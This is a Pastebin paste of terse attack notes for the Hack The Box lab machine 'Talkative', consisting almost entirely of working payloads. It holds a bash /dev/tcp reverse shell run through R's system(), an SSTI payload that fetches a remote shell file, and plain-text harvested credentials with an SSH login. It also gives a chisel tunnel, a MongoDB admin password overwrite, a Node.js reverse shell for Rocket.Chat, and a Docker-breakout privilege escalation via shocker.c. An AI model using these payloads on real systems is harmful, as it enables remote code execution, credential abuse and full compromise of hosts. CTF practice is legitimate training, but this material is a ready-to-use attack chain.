API tools faq
paste
Advertisement
Mr_hEx

talkative htb

Mr_hEx
May 4th, 2022 (edited)
116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
raw download clone embed print report
  1. #Port 8080 => RCE
  2. system("echo 'bash -i >& /dev/tcp/10.10.14.122/4400 0>&1' > /tmp/null.sh;chmod +x /tmp/null.sh;bash /tmp/null.sh", intern = TRUE)
  3.  
  4. #from port 8080 :
  5. {"A": {"labels": [[0, "Username", "Username", false], [1, "matt@talkative.htb", "matt@talkative.htb", false], [2, "janit@talkative.htb", "janit@talkative.htb", false], [3, "saul@talkative.htb", "saul@talkative.htb", false]]}, "B": {"labels": [[0, "Password", "Password", false], [1, "jeO09ufhWD<s", "jeO09ufhWD<s", false], [2, "bZ89h}V<S_DA", "bZ89h}V<S_DA", false], [3, ")SQWGm>9KHEA", ")SQWGm>9KHEA", false]]}, "C": {"labels": []}}
  6.  
  7.  
  8. #for bolt SSTI
  9. {{['curl --connect-timeout 5 http://10.10.14.153:8000/shell2.txt -o hex.php']|filter('system')}}
  10.  
  11.  
  12.  
  13. #for saul user locally !!
  14. ssh saul@10.10.11.155
  15. pass : jeO09ufhWD<s
  16.  
  17.  
  18. #for tunnel connection => mongoDB
  19. ./chisel server -p 2030 --reverse
  20. ./chisel client 10.10.14.128:2030 R:27017:172.17.0.2:27017
  21.  
  22. #for update admin password
  23. db.getCollection('users').update({username:"admin"}, {$set: {"services" :{"password":{"bcrypt":"$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG"}}}})
  24.  
  25.  
  26. #for rocket chat RCE
  27. const require = console.log.constructor('return process.mainModule.require')();
  28. var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
  29. var client = new net.Socket();
  30. client.connect(7700, "10.10.14.128", function(){
  31. client.pipe(sh.stdin);
  32. sh.stdout.pipe(client);
  33. sh.stderr.pipe(client);
  34. });
  35.  
  36. #transfer a file over /dev/tcp
  37. cat < /dev/tcp/IP/PORT > FileName
  38. nc -lvnp 2030 < FileName
  39.  
  40.  
  41. #root !!
  42. 1 - check linux capabilities
  43. 2 - decode it locally then I found => cap_dac_read_search
  44. https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_dac_read_search
  45. https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
  46. https://man7.org/linux/man-pages/man2/open_by_handle_at.2.html
  47. http://stealth.openwall.net/xSports/shocker.c
  48. if you want expolit work edit this : if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0) => if ((fd1 = open("/etc/hosts", O_RDONLY)) < 0)
  49. then compite it locally and trnasfer it then run it
  50.  
  51.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!